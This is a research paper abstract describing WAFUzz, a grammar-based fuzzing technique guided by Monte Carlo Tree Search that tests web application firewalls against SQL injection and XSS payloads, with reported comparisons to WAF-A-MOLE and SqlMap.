WAFUzz:A Fuzz-based WAF protection function testing technology

Web Application Firewalls (WAFs) are designed to detect and intercept potentially malicious HTTP requests, thereby protecting web applications from various attacks. However, if the WAF’s rule set and detection strategy are flawed, its protection function may fail under certain conditions, making it difficult to ensure comprehensive application security. Existing WAF protection testing methods either rely on fixed attack payload datasets, which may lead to inefficient testing due to dataset limitations, or use machine learning to pre-train adversarial WAF models, which are not suitable for testing WAF services deployed in the real world. To address this issue, we propose a new WAF evaluation technique based on fuzz testing. This method uses context-free grammars to generate diverse attack payloads and combines Monte Carlo Tree Search (MCTS) to optimize mutation paths, thereby achieving systematic testing of WAF defense measures. Specifically, we predefine context-free grammars for SQL injection (SQLi) and cross-site scripting (XSS) based on expert knowledge to generate the initial input for fuzz testing and serve as seed payloads for subsequent mutations. Then, MCTS guides the mutation process by dynamically adjusting node weights to prioritize the exploration of promising paths, thereby improving test efficiency and effectiveness. Experimental results show that our approach reduces the protection failure rate of SQLi and XSS to 48.80% and 37.80%, respectively, outperforming benchmark tools such as WAF-A-MOLE and SqlMap. In addition, the invalid payload rate is also reduced to 5.63% and 6.72% for SQLi and XSS, and the number of WAF queries is reduced by more than 22 times, demonstrating the excellent evaluation efficiency of our approach.